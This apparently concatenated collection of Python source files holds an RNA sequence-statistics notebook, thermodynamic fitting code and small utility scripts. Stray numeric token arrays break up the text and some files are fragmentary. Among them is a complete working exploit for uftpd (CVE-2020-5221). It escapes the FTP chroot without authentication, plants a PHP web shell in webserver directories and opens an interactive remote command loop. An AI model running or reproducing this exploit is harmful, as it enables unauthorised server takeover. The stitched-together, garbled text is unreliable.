from KmerTools import KmerTools
from RNA_describe import *
from GenCodeTools import *
from plot_generator import *
except:
print("CoLab not working. On my PC, use relative paths.")
IN_COLAB = False
DATAPATH='../data/' # must end in "/"
sys.path.append("..") # append parent dir in order to use sibling dirs
from SimTools.RNA_describe import *
from SimTools.GenCodeTools import *
from SimTools.plot_generator import *
from SimTools.KmerTools import KmerTools
MODELPATH="BestModel" # saved on cloud instance and lost after logout
#MODELPATH=DATAPATH+MODELPATH # saved on Google Drive but requires login
if not assert_imported_RNA_describe():
print("ERROR: Cannot use RNA_describe.")
# ## Load GENCODE Data
# Loads GENCODE v38 data.
#
# Filters out mRNA sequences based on UTR check.
# In[3]:
PC_FILENAME='gencode.v38.pc_transcripts.fa.gz'
NC_FILENAME='gencode.v38.lncRNA_transcripts.fa.gz'
PC_FULLPATH=DATAPATH+PC_FILENAME
NC_FULLPATH=DATAPATH+NC_FILENAME
loader=GenCodeLoader()
loader.set_label(1)
loader.set_check_list(None)
loader.set_check_utr(True)
pcdf=loader.load_file(PC_FULLPATH)
print("PC seqs loaded:",len(pcdf))
loader.set_label(0)
loader.set_check_list(None)
loader.set_check_utr(False)
ncdf=loader.load_file(NC_FULLPATH)
print("NC seqs loaded:",len(ncdf))
# ## Process Sequences
#
# Generate Sample of GENCODE Data Set
#
# Apply Length Constraints
#
# Validate Sequences
# In[4]:
APPLY_SUBSET = True #Option to subset the data
MINIMUM_SEQUENCE_LENGTH = 200 #Minimum exclusive length to filter out sequences by
MAXIMUM_SEQUENCE_LENGTH = 4000 #Maximum inclusive length to filter out sequences by
SAMPLE_FRACTION = 1 #What fraction of the GenCode data set to take a sample of
REPRODUCABILITY_SEED = 314159 #Use to reproduce random sampling
# In[5]:
# Down-sample both DataFrames with a fixed seed so the subset is reproducible.
# (With SAMPLE_FRACTION = 1 this is effectively a seeded shuffle.)
if APPLY_SUBSET:
    pcdf = pcdf.sample(frac=SAMPLE_FRACTION, random_state=REPRODUCABILITY_SEED)
    ncdf = ncdf.sample(frac=SAMPLE_FRACTION, random_state=REPRODUCABILITY_SEED)
print('PC sample size:', len(pcdf))
print('NC sample size:', len(ncdf))
# Apply Length Constraints
# In[6]:
# In[7]:
pc_sequences = pcdf['sequence'].tolist()
nc_sequences = ncdf['sequence'].tolist()
# subset_list_by_len_bounds is a project helper defined outside this chunk;
# per the constant comments above, the lower bound is exclusive and the
# upper bound inclusive -- TODO confirm in its definition.
if APPLY_SUBSET:
    pc_sequences = subset_list_by_len_bounds(pc_sequences, MINIMUM_SEQUENCE_LENGTH, MAXIMUM_SEQUENCE_LENGTH)
    nc_sequences = subset_list_by_len_bounds(nc_sequences, MINIMUM_SEQUENCE_LENGTH, MAXIMUM_SEQUENCE_LENGTH)
print('PC seqs in length range','('+str(MINIMUM_SEQUENCE_LENGTH),'-',str(MAXIMUM_SEQUENCE_LENGTH)+'):', len(pc_sequences))
print('NC seqs in length range','('+str(MINIMUM_SEQUENCE_LENGTH),'-',str(MAXIMUM_SEQUENCE_LENGTH)+'):', len(nc_sequences))
#Garbage collection: the DataFrames are no longer needed once the raw
#sequence lists have been extracted.
pcdf = None
ncdf = None
def valid_sequence(seq):
    """Return True if *seq* contains only the uppercase DNA bases A, C, G, T.

    Any other character (lowercase bases, ambiguity codes such as 'N',
    gaps, etc.) makes the whole sequence invalid. An empty sequence is
    considered valid, matching the original loop-based implementation.
    """
    # all() short-circuits on the first bad character, like the original
    # early `return False`. `base` avoids shadowing the builtin chr().
    return all(base in {'A', 'C', 'G', 'T'} for base in seq)
def validate_sequences(sequences):
    """Remove all invalid sequences from *sequences*, in place.

    A sequence is kept iff valid_sequence() accepts it. The original
    implementation called list.remove() inside a scan, which is O(n^2)
    over large sequence sets; this single-pass filter is O(n), preserves
    the relative order of the survivors, and still mutates the caller's
    list (via slice assignment) exactly as the original did.
    """
    sequences[:] = [seq for seq in sequences if valid_sequence(seq)]
# Drop, in place, any sequence containing characters outside A/C/G/T.
validate_sequences(pc_sequences)
validate_sequences(nc_sequences)
print('Valid PC seqs:', len(pc_sequences))
print('Valid NC seqs:', len(nc_sequences))
# ## Generate Simulated Sequences
# In[9]:
NUM_FAKE_SEQS_PER_LENGTH = 15
# Seed the RNG so the simulated set is reproducible across runs.
random.seed(REPRODUCABILITY_SEED)
fake_sequences = []
# NUM_FAKE_SEQS_PER_LENGTH uniform-random ACGT strings for every length
# from MINIMUM_SEQUENCE_LENGTH+1 through MAXIMUM_SEQUENCE_LENGTH.
for length in range(MINIMUM_SEQUENCE_LENGTH + 1, MAXIMUM_SEQUENCE_LENGTH + 1):
    for size in range(0, NUM_FAKE_SEQS_PER_LENGTH):
        sequence = ''.join(random.choices(['A', 'C', 'G', 'T'], k=length))
        fake_sequences.append(sequence)
print('Simulated Sequences:', len(fake_sequences))
# ## Generate Statistics
#
# Using KmerTools to get the K-mer counts upto 3.
# It returns the value in Dictionary form. (Key-Value Pair)
# In[10]:
MAX_K = 3
tool = KmerTools()  # project helper defined outside this chunk
# Same three-step recipe for each sequence set (PC, NC, simulated):
# build a count dict for K=1..MAX_K, accumulate counts per sequence,
# harvest, then convert raw counts to frequencies. The exact semantics
# of the boolean flag and the harvest step live in KmerTools.
pc_counts = tool.make_dict_upto_K(MAX_K)
for sample in pc_sequences:
    tool.update_count_one_K(pc_counts,MAX_K,sample,True)
tool.harvest_counts_from_K(pc_counts,MAX_K)
pc_freqs = tool.count_to_frequency(pc_counts,MAX_K)
nc_counts = tool.make_dict_upto_K(MAX_K)
for sample in nc_sequences:
    tool.update_count_one_K(nc_counts,MAX_K,sample,True)
tool.harvest_counts_from_K(nc_counts,MAX_K)
nc_freqs = tool.count_to_frequency(nc_counts,MAX_K)
fake_counts = tool.make_dict_upto_K(MAX_K)
for sample in fake_sequences:
    tool.update_count_one_K(fake_counts, MAX_K, sample, True)
tool.harvest_counts_from_K(fake_counts, MAX_K)
fake_freqs = tool.count_to_frequency(fake_counts, MAX_K)
#Garbage collection: only the frequency dicts are used from here on.
pc_counts = None
nc_counts = None
fake_counts = None
# In[11]:
# Index ranges for slicing the flattened key/value lists into K groups:
# 4 possible 1-mers, 16 2-mers, 64 3-mers (4**K each).
# NOTE(review): this assumes the KmerTools dict lists all 1-mers first,
# then all 2-mers, then all 3-mers -- confirm against make_dict_upto_K.
ONE_MER_MIN = 0
ONE_MER_MAX = 4**1
TWO_MER_MIN = 4**1
TWO_MER_MAX = 4**2 + 4**1
THREE_MER_MIN = 4**2 + 4**1
THREE_MER_MAX = 4**3 + 4**2 + 4**1
one_mer_keys = list(pc_freqs.keys())[ONE_MER_MIN:ONE_MER_MAX]
two_mer_keys = list(pc_freqs.keys())[TWO_MER_MIN:TWO_MER_MAX]
three_mer_keys = list(pc_freqs.keys())[THREE_MER_MIN:THREE_MER_MAX]
# Rebind the names from dicts to plain value lists for slicing below.
pc_freqs = list(pc_freqs.values())
nc_freqs = list(nc_freqs.values())
fake_freqs = list(fake_freqs.values())
one_mer_pc = np.asarray(pc_freqs[ONE_MER_MIN:ONE_MER_MAX])
one_mer_nc = np.asarray(nc_freqs[ONE_MER_MIN:ONE_MER_MAX])
one_mer_fake = np.asarray(fake_freqs[ONE_MER_MIN:ONE_MER_MAX])
two_mer_pc = np.asarray(pc_freqs[TWO_MER_MIN:TWO_MER_MAX])
two_mer_nc = np.asarray(nc_freqs[TWO_MER_MIN:TWO_MER_MAX])
two_mer_fake = np.asarray(fake_freqs[TWO_MER_MIN:TWO_MER_MAX])
three_mer_pc = np.asarray(pc_freqs[THREE_MER_MIN:THREE_MER_MAX])
three_mer_nc = np.asarray(nc_freqs[THREE_MER_MIN:THREE_MER_MAX])
three_mer_fake = np.asarray(fake_freqs[THREE_MER_MIN:THREE_MER_MAX])
#Garbage collection
pc_freqs = None
nc_freqs = None
fake_freqs = None
# Generate max ORF lengths
# In[12]:
oc = ORF_counter()  # project helper defined outside this chunk
# Each per-set result is a 1-element object array wrapping a float vector;
# this wrapping is the shape consumed by pg.box_plot further below.
pc_max_orf_len = np.empty(1, dtype=object)
nc_max_orf_len = np.empty(1, dtype=object)
fake_max_orf_len = np.empty(1, dtype=object)
pc_max_orf_len[0] = np.zeros(len(pc_sequences))
nc_max_orf_len[0] = np.zeros(len(nc_sequences))
fake_max_orf_len[0] = np.zeros(len(fake_sequences))
# Longest open-reading-frame length per sequence, per data set.
for i in range(len(pc_sequences)):
    oc.set_sequence(pc_sequences[i])
    pc_max_orf_len[0][i] = oc.get_max_orf_len()
for i in range(len(nc_sequences)):
    oc.set_sequence(nc_sequences[i])
    nc_max_orf_len[0][i] = oc.get_max_orf_len()
for i in range(len(fake_sequences)):
    oc.set_sequence(fake_sequences[i])
    fake_max_orf_len[0][i] = oc.get_max_orf_len()
# Get sequence lengths and sequence length vs. max ORF length correlation coefficients
# In[13]:
# np.corrcoef returns the full 2x2 correlation matrix; the off-diagonal
# entries hold the length-vs-max-ORF-length coefficient.
# (Idiom: list comprehensions replace list(map(lambda x: len(x), ...)).)
pc_seq_len = np.asarray([len(seq) for seq in pc_sequences])
pc_seq_len_orf_len_corrcoef = np.corrcoef(pc_seq_len, pc_max_orf_len[0])
nc_seq_len = np.asarray([len(seq) for seq in nc_sequences])
nc_seq_len_orf_len_corrcoef = np.corrcoef(nc_seq_len, nc_max_orf_len[0])
fake_seq_len = np.asarray([len(seq) for seq in fake_sequences])
fake_seq_len_orf_len_corrcoef = np.corrcoef(fake_seq_len, fake_max_orf_len[0])
# ## Results
# In[14]:
data_set_names = ['mRNA', 'lncRNA']
pg = PlotGenerator()  # project plotting helper defined outside this chunk
# Bar charts of mean 1-/2-/3-mer frequencies for the two real data sets
# (the simulated-set arrays computed above are not plotted here).
pg.set_text_options(90, 'center', 0, 'center', 12)
pg.set_text('Mean 1-Mer Frequencies', 'Mer', 'Mean Frequency', one_mer_keys, None)
pg.bar_plot([one_mer_pc, one_mer_nc], data_set_names)
pg.set_text_options(90, 'center', 0, 'center', 12)
pg.set_text('Mean 2-Mer Frequencies', 'Mer', 'Mean Frequency', two_mer_keys, None)
pg.bar_plot([two_mer_pc, two_mer_nc], data_set_names)
pg.set_figure_options(width=14)  # widen the figure for the 64 3-mer bars
pg.set_text_options(90, 'center', 0, 'center', 12)
pg.set_text('Mean 3-Mer Frequencies', 'Mer', 'Mean Frequency', three_mer_keys, None)
pg.bar_plot([three_mer_pc, three_mer_nc], data_set_names)
pg.set_figure_options()  # presumably resets to default size -- confirm in PlotGenerator
pg.set_text_options(45, 'right', 0, 'center', 12)
pg.set_text('Max ORF Lengths', 'RNA Types', 'Max ORF Length', [''], None)
pg.box_plot([pc_max_orf_len, nc_max_orf_len], data_set_names, False)
# Scatter plots of per-sequence length vs. max ORF length, with trendline,
# plus the printed correlation matrices computed above.
pg.set_text('mRNA ORF Length vs Sequence Length', 'Sequence Length', 'ORF Length', None, None)
pg.scatter_plot(pc_seq_len, pc_max_orf_len[0], trendline=True)
print('mRNA Sequence Length ORF Length Correlation Coefficient:')
print('\t', pc_seq_len_orf_len_corrcoef)
pg.set_text('lncRNA ORF Length vs Sequence Length', 'Sequence Length', 'ORF Length', None, None)
pg.scatter_plot(nc_seq_len, nc_max_orf_len[0], trendline=True)
print('lnc Sequence Length ORF Length Correlation Coefficient:')
print('\t', nc_seq_len_orf_len_corrcoef)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
2,
1303,
16213,
9107,
198,
2,
220,
198,
2,
5133,
16772,
11,
22632,
11,
290,
832,
4572,
4673,
8996,
47227,
290,
300,
10782,
27204,
16311,
4... | 2.449851 | 4,377 |
#!/usr/bin/env python3
# Author: Aaron Esau (Arinerron) <security@aaronesau.com>
# Writeup: https://aaronesau.com/blog/posts/6
# Product: uftpd 2.6-2.10
# CVE ID: CVE-2020-5221
# This exploit uses a directory traversal vulnerability and escapes uftpd's
# crappy implementation of a chroot jail. It does not require authentication.
# It looks for common webserver paths on the FTP server and attempts to place a
# PHP backdoor to pop a shell with.
#################
# Configuration #
#################
# the IPv4 address of the remote host
# (may be overridden by the first command-line argument below)
RHOST = '127.0.0.1'
# an IPv4 address accessible from the remote host
# (auto-detected below via gethostbyname(gethostname()))
LHOST = '127.0.0.1'
# the port that the FTP server is using on the remote host
# (may be overridden by the second command-line argument below)
RPORT = 21
# the filename (basename) of the file to upload
FILENAME = 'shell.php'
# the contents of the uploaded file
FILE_CONTENT = '<?php system($_REQUEST["cmd"]); ?>\n'
# make a GET request to see if the file is accessible afterward?
CHECK_FILE = True
# a list of webserver paths to check on the remote host, in order of priority
WEBSERVER_PATHS = [
    '/var/www/html/',
    '/srv/http/',
    '/web/',
    '/www',
    '/srv/www-data/',
    '/srv/www/',
    '/var/www/',
    '/srv/'
]
# whether or not to upload the file in each directory or only the first found
STOP_ON_FIRST = True
# if True, it will not check if a directory exists, just try to upload immediately
# Note: If enabled, it will ignore STOP_ON_FIRST
AGGRESSIVE_MODE = False
# if True, it will only upload if it detects "webserver-like" files in the directory
# Note: If enabled, it will ignore AGGRESSIVE_MODE
STRICT_WEBSERVER = True
# these are the extensions to use to identify "webserver-like" directories
WEBSERVER_EXTENSIONS = [
    '.php',
    '.aspx',
    '.asp',
    '.cgi',
    '.html',
    '.htm',
    '.js',
    '.css',
    '.scss'
]
# this makes logging get messy, useful if the script is broken
# NOTE(review): DEBUG is not referenced anywhere in this chunk -- presumably
# consumed by the stripped log() helper; confirm before removing.
DEBUG = False
# cheers, no external libraries!
import sys, socket, urllib.request, urllib.parse, re, time

# try to configure things if the person was too lazy to open this PoC
if len(sys.argv) >= 2:
    RHOST = sys.argv[1]
if len(sys.argv) >= 3:
    # bug fix: argv entries are strings; RPORT is later interpolated with
    # the '%d' format specifier and used as a socket port, so it must be
    # converted to int here (the original left it as str).
    RPORT = int(sys.argv[2])

# they were probably too lazy to configure this too :(
LHOST = socket.gethostbyname(socket.gethostname())
# nice logging things
# PEP 8 (E731): named functions instead of lambda assignments; behavior
# is unchanged -- each helper forwards to log() (defined elsewhere in
# this file) with a fixed marker character and ANSI color, and returns
# whatever log() returns, exactly like the original lambdas.
def vlog(msg):
    """Verbose/plain message: blank marker, default terminal color."""
    return log(msg, char=' ', color='\033[0m')

def dlog(msg):
    """Debug message using log()'s default marker and color."""
    return log(msg)

def ilog(msg):
    """Info/success message: green '+' marker."""
    return log(msg, char='+', color='\033[92m')

def wlog(msg):
    """Warning message: yellow '!' marker."""
    return log(msg, char='!', color='\033[33m')

def elog(msg):
    """Error message: bold red '-' marker."""
    return log(msg, char='-', color='\033[01m\033[31m')
# useful socket functions
# useful ftp things
# creates the format octet,octet,octet,octet,portnumb,portnumb for FTP PORT cmd
# removes duplicate slashes from filepaths
# send an FTP command, made for lazy devs
# send a command and get data response
# send a command and get data response
# returns a list of tuples (name, perms)
# uploads a file with contents `contents` to a file named `filename`
################
# Exploit Code #
################
if __name__ == '__main__':
    # NOTE(review): the helpers tcp, LIST, STOR and strip_slashes called
    # below are defined elsewhere in this file (their marker comments
    # survive just above this block, but the definitions are not in view).
    # make a nice pretty banner thing
    print()
    ilog('''\033[01m\033[32muftpd Directory Traversal (Chroot Bypass)
\033[0m\033[32mAuthor: Aaron Esau (Arinerron)
Writeup: \033[04mhttps://aaronesau.com/blog/posts/6
''')
    # try to connect to the server
    ilog('Connecting to %s:%d...' % (RHOST, RPORT))
    sock = tcp.client(RHOST, RPORT)
    # banner check the server: uftpd announces itself in the FTP greeting
    banner = sock.read()
    dlog('Banner: ' + banner)
    if not 'uftpd' in banner:
        elog('A uftpd server does not appear to be running at %s:%d' %(RHOST, RPORT))
    # NOTE(review): non-raw string with backslash escapes in a regex --
    # works, but r'...' would be the conventional (and warning-free) form.
    banner_match = re.search('.*uftpd \((2\.(10|[6-9])).*\).*', banner)
    if not banner_match:
        wlog('The target uftpd server does not appear to be running the right version')
    else:
        ilog('The target appears to be running uftp version %s which is vulnerable' % banner_match.group(1))
    # we'll add all the paths here we want to upload to
    targets = set()
    found = False
    # try each path
    for path in WEBSERVER_PATHS:
        # "aggressive mode" tells it to not check if the directory exists first
        if not (AGGRESSIVE_MODE and not STRICT_WEBSERVER):
            files = LIST(sock, path)
            if len(files) != 0:
                found = True
                dlog('Found a directory with %d files' % len(files))
                # look for webserver-like file extensions
                found_extensions = set()
                for filename, perms in files:
                    for extension in WEBSERVER_EXTENSIONS:
                        if filename.endswith(extension):
                            found_extensions.add(extension)
                # if we found "webserver-like" extensions
                if len(found_extensions) != 0:
                    extensions_list = ', '.join(found_extensions)
                    # we gotta keep good english here tho
                    if len(found_extensions) == 2:
                        extensions_list = ' and '.join(found_extensions)
                    elif len(found_extensions) > 2:
                        extensions_list = ', '.join(list(found_extensions)[:-1]) + ', and ' + list(found_extensions)[-1]
                    dlog('Found files with the extension' + ('s' if len(found_extensions) > 1 else '') + ' %s, so this path is probably a webserver' % extensions_list)
                # ok well we found what we wanted, let's keep it
                # (in strict mode a path with no webserver-like files is skipped)
                if not (STRICT_WEBSERVER and len(found_extensions) == 0):
                    targets.add(path)
                    # warn about overwriting files
                    for filename, perms in files:
                        if FILENAME == filename:
                            wlog('Will overwrite existing file %s' % strip_slashes(path + FILENAME))
                            break
        else:
            # aggressive mode, we want it!
            targets.add(path)
        # stop if told to
        if (found and STOP_ON_FIRST):
            vlog('STOP_ON_FIRST is enabled and a path was found, stopping...')
            break
    # tell the user if we didn't find anything
    if len(targets) == 0:
        wlog('Either the vulnerability is unexploitable or we were unable to find a writable path')
    else:
        # now upload to each path we found
        for path in targets:
            basename = FILENAME
            filename = strip_slashes(path + '/' + basename)
            dlog('Uploading %s to %s ...' % (basename, filename))
            if not STOR(sock, filename, FILE_CONTENT):
                wlog('Failed to upload file to %s' % filename)
            else:
                ilog('File uploaded to %s' % filename)
                # check the webserver to see if the file is accessible
                if CHECK_FILE:
                    url = 'http://%s/%s' % (RHOST, FILENAME)
                    found = False
                    try:
                        urllib.request.urlopen(url, timeout = 5).read().decode('utf-8', errors = 'ignore')
                        found = True
                        ilog('Hooray, your file was found at %s ...have fun!' % url)
                    # NOTE(review): bare except -- deliberately treats any
                    # failure (HTTP error, timeout, DNS) as "not found",
                    # but it also swallows KeyboardInterrupt here.
                    except:
                        wlog('The file %s could not be found on the webserver, you will have to manually look for it' % FILENAME)
                    # if the user is super lazy and didn't even bother to configure, let's just pop a nice shell
                    if found and (FILENAME == 'shell.php' and FILE_CONTENT.strip() == '<?php system($_REQUEST["cmd"]); ?>'):
                        try:
                            # interactive loop: forward each typed command to the
                            # PHP backdoor via ?cmd=... and print the response
                            while True:
                                cmd = urllib.parse.urlencode({'cmd' : input('$ ')})
                                print(urllib.request.urlopen(url + '?' + cmd, timeout = 5).read().decode('utf-8', errors = 'ignore')[:-1])
                        except (KeyboardInterrupt, EOFError) as e:
                            pass
    dlog('Script finished, goodbye!')
    exit()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
628,
198,
2,
6434,
25,
12139,
8678,
559,
357,
3163,
7274,
1313,
8,
1279,
12961,
31,
64,
283,
1952,
559,
13,
785,
29,
198,
2,
19430,
929,
25,
3740,
1378,
64,
283,
1952,
559,
13,
78... | 2.372689 | 3,354 |
"""
Name: ExSTraCS_Online_Environement.py
Authors: Ryan Urbanowicz - Written at Dartmouth College, Hanover, NH, USA
Contact: ryan.j.urbanowicz@darmouth.edu
Created: April 25, 2014
Modified: August 25,2014
Description: ExSTraCS is best suited to offline iterative learning, however this module has been implemented as an example of how ExSTraCS may be used
to perform online learning as well. Here, this module has been written to perform online learning for a n-multiplexer problem, where training
instances are generated in an online fashion. This module has not been fully tested.
---------------------------------------------------------------------------------------------------------------------------------------------------------
ExSTraCS V2.0: Extended Supervised Tracking and Classifying System - An advanced LCS designed specifically for complex, noisy classification/data mining tasks,
such as biomedical/bioinformatics/epidemiological problem domains. This algorithm should be well suited to any supervised learning problem involving
classification, prediction, data mining, and knowledge discovery. This algorithm would NOT be suited to function approximation, behavioral modeling,
or other multi-step problems. This LCS algorithm is most closely based on the "UCS" algorithm, an LCS introduced by Ester Bernado-Mansilla and
Josep Garrell-Guiu (2003) which in turn is based heavily on "XCS", an LCS introduced by Stewart Wilson (1995).
Copyright (C) 2014 Ryan Urbanowicz
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABLILITY
or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
---------------------------------------------------------------------------------------------------------------------------------------------------------
"""
#Import Required Modules-------------------------------
from exstracs.exstracs_data import DataManagement
from exstracs.exstracs_constants import *
from exstracs.Online_Learning.problem_multiplexer import * #http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python
import sys
#------------------------------------------------------ | [
37811,
198,
5376,
25,
220,
220,
220,
220,
220,
220,
220,
1475,
2257,
430,
7902,
62,
14439,
62,
4834,
2268,
972,
13,
9078,
198,
30515,
669,
25,
220,
220,
220,
220,
6047,
14665,
47982,
532,
22503,
379,
47888,
5535,
11,
9530,
2502,
11,... | 4.255385 | 650 |
"""
cP_EOS.py
SPDX-License-Identifier: BSD-2-Clause
Copyright (c) 2021 Stuart Nolan. All rights reserved.
"""
import pdb
import CoolProp.CoolProp as cP
from CoolProp import AbstractState as cPAS
from tabulate import tabulate
from scipy.optimize import minimize
"""
from CoolProp/include/DataStructures.h
0 iphase_liquid, < Subcritical liquid
1 iphase_supercritical, < Supercritical (p > pc, T > Tc)
2 iphase_supercritical_gas, < Supercritical gas (p < pc, T > Tc)
3 iphase_supercritical_liquid, < Supercritical liquid (p > pc, T < Tc)
4 iphase_critical_point, < At the critical point
5 iphase_gas, < Subcritical gas
6 iphase_twophase, < Twophase
7 iphase_unknown, < Unknown phase
8 iphase_not_imposed
import CoolProp
CoolProp.iphase_twophase
Out: 6
"""
# Map every fluid name CoolProp knows to its CAS registry number.
# (C404) dict comprehension instead of dict() wrapped around a list of
# (key, value) tuples -- same mapping, no intermediate list.
cPFluids = {fluid: cP.get_fluid_param_string(fluid, "CAS")
            for fluid in cP.get_global_param_string("fluids_list").split(',')}
# H2, N2, CO ternary data, Table VI, pA-4 (p78), Eubanks, 1957
# REF: https://scholarship.rice.edu/bitstream/handle/1911/18254/3079688.PDF?sequence=1&isAllowed=y
c1="Hydrogen"
c2="Nitrogen"
rawdata_header=["T /degF", "P /psia", "%s lMF" % c1 , "%s vMF" % c1]
rawdata = [
[-310,315,0.0487, 0.8655],
[-310,500,0.0763, 0.8948],
# [-310,1400,0.2488, 0.8622],
# [-310,2000,0.3446, 0.7977],
[-280,315,0.0377, 0.5509],
[-280,500,0.0741, 0.6686],
[-280,800,0.1384, 0.7205],
[-280,1100,0.2092, 0.7070],
[-280,1400,0.3221, 0.6462],
]
data_header=["T /K", "P /bar", "%s lMF" % c1 , "%s vMF" % c1]
data = []
psia2bar = lambda P : P/14.503774
degF2K = lambda T : 5/9*(T - 32) + 273.15
for row in rawdata:
data.append([degF2K(row[0]),psia2bar(row[1]),row[2],row[3]])
#print(tabulate(data,headers=data_header)+'\n')
EOS="PR"
cPAS_cEOS = cPAS(EOS, c1+"&"+c2)
res = minimize(cEOS_fit_kij, 0.1, bounds=[(-0.2,0.5)], args=(data, cPAS_cEOS))
kij=res.x[0]
#kij=0.0864 # EOS="PR"
#kij=0.0641 # EOS="SRK"
cPAS_cEOS.set_binary_interaction_double(0,1,"kij",kij)
(DPpP,Dy,outData) = deltaVar(data,cPAS_cEOS)
outData_header=["T_exp /K", "c1 lMF_exp", "P_exp /bar", "P_%s /bar" % EOS,
"c1 vMF_exp", "c1 vMF_%s" % EOS]
print("\nc1: %s;" % c1)
print("c2: %s;" % c2)
print("kij: %.4f; DPpP_%s: %.2f; Dy_%s: %.2f;\n" % (kij, EOS, DPpP, EOS, Dy))
print(tabulate(outData,headers=outData_header)+'\n')
CAS_c1=cPFluids[c1]
CAS_c2=cPFluids[c2]
# [c2-c1 betaT gammaT betaV gammaV], Table A8, ref 31, Kunz & Wagner 2012
# REF: https://github.com/CoolProp/CoolProp/blob/master/dev/mixtures/KunzWagner2012_TableA8.txt
#cP.set_mixture_binary_pair_data(CAS_c1,CAS_c2,'betaT',0.972532065)
#cP.set_mixture_binary_pair_data(CAS_c1,CAS_c2,'betaV',0.946134337)
EOS = "HEOS"
cPAS_HEOS = cP.AbstractState(EOS,c1+"&"+c2)
"""
(DPpP,Dy,outData) = deltaVar(data,cPAS_HEOS)
# pdb.pm() from ipython...
outData_header=["T_exp /K", "c1 lMF_exp", "P_exp /bar", "P_%s /bar" % EOS,
"c1 vMF_exp", "c1 vMF_%s" % EOS]
print("\nc1: %s;" % c1)
print("c2: %s;" % c2)
print("DPpP_%s: %.2f; Dy_%s: %.2f;\n" % (EOS, DPpP, EOS, Dy))
print(tabulate(outData,headers=outData_header)+'\n')
"""
| [
37811,
198,
66,
47,
62,
36,
2640,
13,
9078,
198,
198,
4303,
36227,
12,
34156,
12,
33234,
7483,
25,
347,
10305,
12,
17,
12,
2601,
682,
198,
15269,
357,
66,
8,
33448,
22559,
27788,
13,
1439,
2489,
10395,
13,
198,
37811,
198,
11748,
... | 2.00581 | 1,549 |
# Copyright 2020 Open Climate Tech Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Aanlyze ML model for weather data at different thresholds
"""
import os, sys
from firecam.lib import settings
from firecam.lib import weather
from firecam.lib import collect_args
from firecam.lib import goog_helper
from firecam.lib import tf_helper
import logging
import numpy as np
if __name__ == "__main__":
    # Script entry point; main() is defined elsewhere in this file
    # (outside this chunk) and drives the weather-data model analysis.
    main()
| [
2,
15069,
12131,
4946,
13963,
9634,
25767,
669,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
... | 3.899225 | 258 |
import os
import subprocess

####################################################################################################
# Additional PYTHONPATH to allow notebooks to import custom modules at a few pre-defined places.

_cwd = os.getcwd()
_line = 'sys.path.append("{}")'
_pythonpath = [
    "import sys, os",
    _line.format(_cwd),  # fix: use the value captured above instead of calling os.getcwd() twice
]

# Add GIT_ROOT/ and a few other subdirs
try:
    _p = subprocess.run(["git", "rev-parse", "--show-toplevel"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    if _p.returncode == 0:
        _git_root = _p.stdout[:-1].decode("utf-8")  # Remove trailing '\n'
        _pythonpath += [
            _line.format(_git_root),                             # GIT_ROOT
            _line.format(os.path.join(_git_root, "src")),        # GIT_ROOT/src
            _line.format(os.path.join(_git_root, "notebooks")),  # GIT_ROOT/notebooks
        ]
except Exception:  # narrowed from bare 'except:' so Ctrl-C/SystemExit still propagate
    pass  # git missing or not a repository -- fall back to the cwd-only path list

c.InteractiveShellApp.exec_lines = _pythonpath  # type: ignore # noqa: F821
| [
11748,
28686,
198,
11748,
850,
14681,
198,
198,
29113,
29113,
29113,
4242,
198,
2,
15891,
350,
56,
4221,
1340,
34219,
284,
1249,
43935,
284,
1330,
2183,
13103,
379,
257,
1178,
662,
12,
23211,
4113,
13,
198,
198,
62,
66,
16993,
796,
28... | 2.701266 | 395 |
import asyncio
import logging
import sys

# Message-only log lines, using str.format-style ('{') placeholders.
# NOTE(review): datefmt has no effect here because the format string
# contains no {asctime} field -- confirm whether timestamps were intended.
logging.basicConfig(format="{message}",
                    style='{',
                    datefmt="%H:%M:%S",
                    level=logging.DEBUG)

if __name__ == "__main__":
    # main() is an async coroutine defined elsewhere in this file
    # (asyncio.run requires a coroutine); CLI args are forwarded positionally.
    asyncio.run(main(*sys.argv[1:]))
| [
11748,
30351,
952,
198,
11748,
18931,
198,
11748,
25064,
628,
198,
6404,
2667,
13,
35487,
16934,
7,
18982,
2625,
90,
20500,
92,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220... | 1.871429 | 140 |